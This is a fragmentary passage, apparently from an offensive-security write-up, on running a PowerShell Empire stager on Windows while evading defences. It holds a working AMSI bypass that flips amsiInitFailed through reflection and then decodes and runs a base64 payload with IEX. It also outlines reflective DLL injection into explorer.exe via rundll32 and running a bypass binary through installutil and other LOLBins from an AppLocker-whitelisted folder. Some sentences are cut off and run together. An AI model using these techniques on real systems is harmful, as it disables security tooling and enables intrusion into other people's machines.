wchar_t* argument = L"[Ref].Assembly.GetType('System.Management.Automation.sAmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$encoded = \"BASE64STRING\";$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded));$decoded | Out-File -FilePath C:\Windows\Tasks\out.txt;IEX $decoded"; //Output debug
ReflectivePick_x64.dll
rundll32.exe .\ReflectivePick_x64.dll,Void
but as you will soon discover, AMSI picks up the Empire stager during runtime.c:\windows\tasks\out.txt
dll.txt
to the $dllData
object. This will ensure the dll is reflectively injected into the explorer.exe
process during runtime.Bypass.exe
with VS.installutil.exe
or similar LOLbBns to execute Bypass.exe
. If Applocker is present, execute it from a whitelisted directory such as C:\Windows\Tasks